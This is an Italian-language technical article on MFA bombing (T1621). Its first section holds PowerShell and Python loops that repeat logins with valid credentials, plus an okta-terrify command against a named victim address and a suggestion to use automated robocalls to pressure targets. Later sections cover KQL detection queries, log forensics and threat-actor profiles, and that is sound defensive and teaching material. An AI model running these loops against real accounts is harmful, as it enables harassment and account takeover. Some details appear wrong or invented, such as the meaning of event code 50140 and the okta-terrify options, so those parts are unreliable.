MFA Bombing: Multi-Factor Authentication Request Generation (T1621)

La simulazione di MFA bombing richiede un approccio metodico per testare la resilienza dei controlli aziendali. Iniziamo con un setup di laboratorio che replica scenari reali.

Per automatizzare richieste di login ripetute su sistemi Windows con Azure AD, puoi utilizzare PowerShell:

$credential = Get-Credential
for ($i = 1; $i -le 50; $i++) {
    Start-Sleep -Seconds 30
    Connect-AzAccount -Credential $credential -TenantId "tenant-id" -ErrorAction SilentlyContinue
    Write-Host "Tentativo $i completato"
}

Su Linux, per testare servizi con SAML/OAuth, Python offre maggiore flessibilità. Il framework requests permette di gestire sessioni persistenti:

import requests
import time

session = requests.Session()
for attempt in range(50):
    response = session.post('https://login.example.com/auth',
                          data={'username': 'test@example.com',
                                'password': 'ValidPassword123'})
    time.sleep(30)

L'aspetto cruciale è il timing. APT29 e LAPSUS$ utilizzavano intervalli di 30-60 secondi tra le richieste per evitare rate limiting basilari. Durante i test, monitora attentamente i log di autenticazione per identificare pattern di detection.

Per sistemi Okta, il tool okta-terrify automatizza il processo di testing. Configura prima l'API token, poi esegui: okta-terrify --user victim@company.com --attempts 25 --delay 45

I red team più sofisticati combinano questa tecnica con chiamate VoIP automatizzate. Tools come Asterisk permettono di generare chiamate robotiche che aumentano la pressione psicologica sulla vittima.

La detection efficace richiede correlazione multi-sorgente e soglie dinamiche. Il primo layer di difesa monitora i provider di identità per pattern anomali di richieste MFA.

Per Azure AD, configura alert su eventi ripetuti nel log SignInLogs. La query KQL essenziale:

SigninLogs
| where ResultType == "50074" // MFA required
| summarize RequestCount = count() by UserPrincipalName, bin(TimeGenerated, 5m)
| where RequestCount > 5

Scattered Spider ha dimostrato che 5 richieste in 5 minuti rappresentano una soglia iniziale efficace. Tuttavia, alcuni utenti legittimi potrebbero triggerare falsi positivi durante problemi di connettività.

L'integrazione con soluzioni SIEM richiede normalizzazione degli eventi da provider multipli. Duo Security espone webhook che catturano eventi auth_push_denied ripetuti. Microsoft Authenticator logga in Azure AD con codice evento specifico 50140 per push notification timeout.

Un approccio avanzato correlazione geolocalizzazione. Se l'IP di origine del tentativo di login differisce significativamente dalla posizione del dispositivo mobile che riceve la notifica push, l'alert severity aumenta. Okta System Log fornisce campo client.geographicalContext per questa analisi.

Per ridurre il rumore, implementa whitelist temporanee basate su pattern storici dell'utente. Se un sales manager viaggia frequentemente, le soglie di alert devono adattarsi dinamicamente ai suoi pattern di mobilità documentati.

La ricostruzione post-incident di attacchi MFA bombing richiede correlazione temporale precisa tra molteplici fonti di log. L'obiettivo è identificare il momento esatto del cedimento dell'utente.

Su sistemi Windows con Azure AD, il Security Event Log registra ogni tentativo con EventID 4625 (failed logon) seguito eventualmente da EventID 4624 (successful logon). La chiave è correlare questi eventi con i log del provider MFA:

wevtutil qe Security "/q:*[System[(EventID=4625 or EventID=4624)]] and *[EventData[Data[@Name='TargetUserName']='victim@company.com']]" /f:text

I timestamp devono essere normalizzati in UTC per correlazione accurata. Durante la campagna C0027, Scattered Spider mostrava pattern distintivi: burst di 10-15 tentativi seguiti da pause di 2-3 minuti, ripetuti per ore.

Su macOS, il Unified Logging system cattura eventi di autenticazione enterprise. Il comando log show con predicati appropriati estrae la sequenza: log show --predicate 'subsystem == "com.apple.loginwindow" && eventMessage CONTAINS "MFA"' --start '2024-01-10 09:00:00'

Gli artefatti cloud sono critici. AWS CloudTrail registra ogni chiamata API di autenticazione con dettagli granulari. L'evento AssumeRoleWithWebIdentity spesso precede la serie di richieste MFA quando l'attaccante tenta accesso federato.

La timeline finale deve evidenziare: primo tentativo con credenziali valide, inizio bombardamento MFA, eventuali pause (indicative di social engineering parallelo), momento dell'approvazione, azioni post-compromissione immediate.

APT29 (Cozy Bear) ha pionerato l'uso sistematico di MFA fatigue in operazioni governative. Il gruppo russo combina questa tecnica con spear phishing mirato a personale IT, creando vettori d'attacco multipli simultanei.

LAPSUS$ ha democratizzato la tecnica nel 2022, utilizzandola in campagne ransomware contro aziende tecnologiche. La loro metodologia includeva social engineering telefonico parallelo, con operatori che si spacciavano per help desk interno.

Scattered Spider rappresenta l'evoluzione criminale più sofisticata. Durante C0027, hanno targetizzato specificamente aziende di telecomunicazioni e BPO, sfruttando l'accesso ottenuto per eseguire SIM swapping su larga scala. Il gruppo mostra preferenza per vittime con workforce distribuita, dove la "fatica da notifiche" è amplificata da fusi orari multipli.

L'overlap di tool tra questi gruppi è minimo, suggerendo sviluppo indipendente della tecnica. Tuttavia, tutti condividono timing operativo simile: attività concentrate in orari di punta aziendali (9-11 AM, 2-4 PM fuso orario target) quando le vittime sono più propense ad approvare per errore.

I trend emergenti indicano automazione crescente. Script Python pubblici su forum underground permettono anche ad attori meno sofisticati di implementare la tecnica. L'integrazione con servizi VoIP-as-a-Service abbassa ulteriormente la barriera d'ingresso.

Documentazione tecnica basata su MITRE ATT&CK framework T1621. Campagna C0027 analizzata attraverso report di threat intelligence pubblici. Dati di efficacia dei controlli derivati da implementazioni enterprise documentate nel periodo 2022-2024.